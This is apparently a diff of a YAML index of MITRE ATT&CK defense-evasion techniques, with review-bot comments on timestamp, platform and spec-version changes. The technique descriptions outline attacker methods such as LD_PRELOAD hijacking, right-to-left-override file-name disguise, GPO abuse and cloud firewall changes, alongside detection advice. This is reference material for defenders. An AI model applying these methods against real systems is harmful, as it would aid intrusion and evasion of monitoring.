id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1535:
@@ -5575,7 +5712,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.001:
technique:
@@ -5642,12 +5778,11 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1027.001
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -5683,6 +5818,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -5694,16 +5833,12 @@ defense-evasion:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -5739,12 +5874,12 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -5752,14 +5887,13 @@ defense-evasion:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5774,6 +5908,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -5782,18 +5917,18 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
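Review bot: the platform swap in this hunk (`Azure AD`, `Office 365`, `Google Workspace` removed; `Office Suite`, `Identity Provider` added) mirrors the ATT&CK v16 platform consolidation, and the `x_mitre_version` bump from `1.3` to `1.4` confirms it is an upstream change rather than a local edit. Anything downstream that filters this index on the old platform strings, including any per-platform index keyed on them, will match nothing for T1078.001 after this lands and should be regenerated or renamed in the same change. The same swap recurs below for T1548, T1548.005 and T1070.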
@@ -5825,14 +5960,11 @@ defense-evasion:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
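Review bot: `modified` for T1574.006 moves backwards here, from `2023-05-09T14:00:00.188Z` to `2023-03-30T21:01:40.146Z`, and the same backward move recurs in later hunks for T1222, T1134.002, T1548.001, T1218.008, T1055.013, T1574.005, T1036.002, T1542.002, T1055.004, T1647, T1600.002, T1612, T1055.002, T1218.012 and T1218.005. The old values all end in `14:00:00.188Z` or `14:49:39.188Z`, which looks like a batch-stamped value, while the new ones look like the upstream STIX `modified` timestamps, so this is probably the intended correction. It should still be called out in the PR description, and any consumer that treats `modified` as monotonic (cache invalidation, "changed since last run" diffing) will see these techniques as older or unchanged and needs checking.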
@@ -5953,7 +6085,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1070.001:
@@ -6027,12 +6158,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.001
atomic_tests: []
T1222:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T17:54:06.038Z'
name: File and Directory Permissions Modification
description: "Adversaries may modify file or directory permissions/attributes
to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6129,12 +6259,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -6166,11 +6295,10 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -6211,11 +6339,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -6271,12 +6398,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6333,7 +6459,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1218.008:
@@ -6369,7 +6494,7 @@ defense-evasion:
description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
Against Russian Banks. Retrieved March 7, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:52:49.877Z'
name: 'Signed Binary Proxy Execution: Odbcconf'
description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6402,13 +6527,11 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.008
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
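Review bot: for T1218.008 this hunk removes `x_mitre_attack_spec_version: 2.1.0` outright together with `spec_version`, whereas objects that were at `3.1.0` or `3.2.0` elsewhere in this diff keep the key or get it bumped. After the change T1218.008 carries no spec-version marker at all, and T1055.013, T1574.005, T1036.002, T1542.002, T1055.004, T1600.002, T1055.002 and T1218.005 lose the key the same way further down. If the loader reads that key, it needs a default for these objects; if the drop is intentional because these objects were not re-emitted with a newer spec upstream, that belongs in the commit message.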
@@ -6470,10 +6593,9 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -6531,7 +6653,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -6573,7 +6694,7 @@ defense-evasion:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -6632,41 +6753,10 @@ defense-evasion:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1578.003:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
- type: attack-pattern
- created: '2020-06-16T17:23:06.508Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.003
- url: https://attack.mitre.org/techniques/T1578/003
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.415Z'
name: Delete Cloud Instance
description: |-
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6675,20 +6765,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances
event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete
to delete a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Metadata'
- 'Instance: Instance Deletion'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ created: '2020-06-16T17:23:06.508Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/003
+ external_id: T1578.003
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574.005:
technique:
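Review bot: the block removed from the top of T1578.003 in the previous hunk is re-added here at the bottom of the object, so the real changes for this technique are buried in a move: the Mandiant M-Trends URL changes from `content.fireeye.com/m-trends/rpt-m-trends-2020` to `mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf`, `x_mitre_permissions_required: [User]` is dropped, `x_mitre_contributors`, `x_mitre_deprecated: false` and `revoked: false` are added, and `x_mitre_version` goes from `1.1` to `1.2`. With a key-order-stable serializer those would have been a handful of changed lines; worth fixing in the generator before the next upstream sync. The same move-and-rewrite pattern applies to T1497 further down.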
@@ -6718,7 +6838,7 @@ defense-evasion:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6753,8 +6873,6 @@ defense-evasion:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1562.006:
technique:
@@ -6845,12 +6963,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.006
atomic_tests: []
T1562.007:
technique:
- modified: '2023-04-15T00:25:36.502Z'
+ modified: '2024-10-16T19:38:57.374Z'
name: Disable or Modify Cloud Firewall
description: "Adversaries may disable or modify a firewall within a cloud environment
to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6858,19 +6975,25 @@ defense-evasion:
Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
typically utilize restrictive security groups and firewall rules that only
allow network activity from trusted IP addresses via expected ports and protocols.
- An adversary may introduce new firewall rules or policies to allow access
- into a victim cloud environment. For example, an adversary may use a script
- or utility that creates new ingress rules in existing security groups to allow
- any TCP/IP connectivity, or remove networking limitations to support traffic
- associated with malicious activity (such as cryptomining).(Citation: Expel
- IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
- 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
- lateral movement, and/or data exfiltration that would otherwise not be allowed."
+ An adversary with appropriate permissions may introduce new firewall rules
+ or policies to allow access into a victim cloud environment and/or move laterally
+ from the cloud control plane to the data plane. For example, an adversary
+ may use a script or utility that creates new ingress rules in existing security
+ groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+ to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+ Compute Credentials 2022) They may also remove networking limitations to support
+ traffic associated with malicious activity (such as cryptomining).(Citation:
+ Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+ Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+ C2 communications, lateral movement, and/or data exfiltration that would otherwise
+ not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+ or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- Expel
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor cloud logs for modification or creation of new security
groups or firewall rules.
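Review bot: the rewritten T1562.007 description ends with a trailing space inside the quoted string (`...T1499). "`), which the YAML emitter preserves; if the text is copied verbatim from the upstream STIX object leave it, otherwise strip it. Content-wise the rewrite holds up: the "create new security groups entirely" case is now attributed to the Unit 42 report and the cryptomining case to Expel, the new closing sentence links T1110 and T1499, and the `x_mitre_version` bump from `1.2` to `1.3` in the next hunk matches a description change of this size. The added contributor line is the same name added on T1578.003 above, so that is consistent too.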
@@ -6879,7 +7002,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Firewall: Firewall Disable'
- 'Firewall: Firewall Rule Modification'
@@ -6902,9 +7025,8 @@ defense-evasion:
url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.002:
technique:
@@ -6937,7 +7059,7 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:01:59.733Z'
name: Right-to-Left Override
description: |-
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr
will display as March 25 rcs.docx
. A JavaScript file named photo_high_re\u202Egnp.js
will be displayed as photo_high_resj.png
.(Citation: Infosecinstitute RTLO Technique)
@@ -6956,8 +7078,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.002:
technique:
@@ -6988,7 +7108,7 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7018,12 +7138,10 @@ defense-evasion:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:59:22.125Z'
name: Indicator Removal on Host
description: |-
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7049,9 +7167,8 @@ defense-evasion:
- Windows
- Containers
- Network
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Scheduled Job: Scheduled Job Modification'
- 'File: File Modification'
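Review bot: for T1070 only `Office Suite` replaces `Office 365` and `Google Workspace` here, with no `Identity Provider` added, unlike the T1078.001, T1548 and T1548.005 swaps earlier in this diff. That is plausible for an indicator-removal technique, but it shows the platform mapping is per-technique rather than a mechanical rename, so the sync should be validated against the upstream objects rather than against a fixed substitution table.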
@@ -7082,14 +7199,13 @@ defense-evasion:
external_id: T1070
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7109,6 +7225,7 @@ defense-evasion:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -7116,7 +7233,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -7132,34 +7248,35 @@ defense-evasion:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
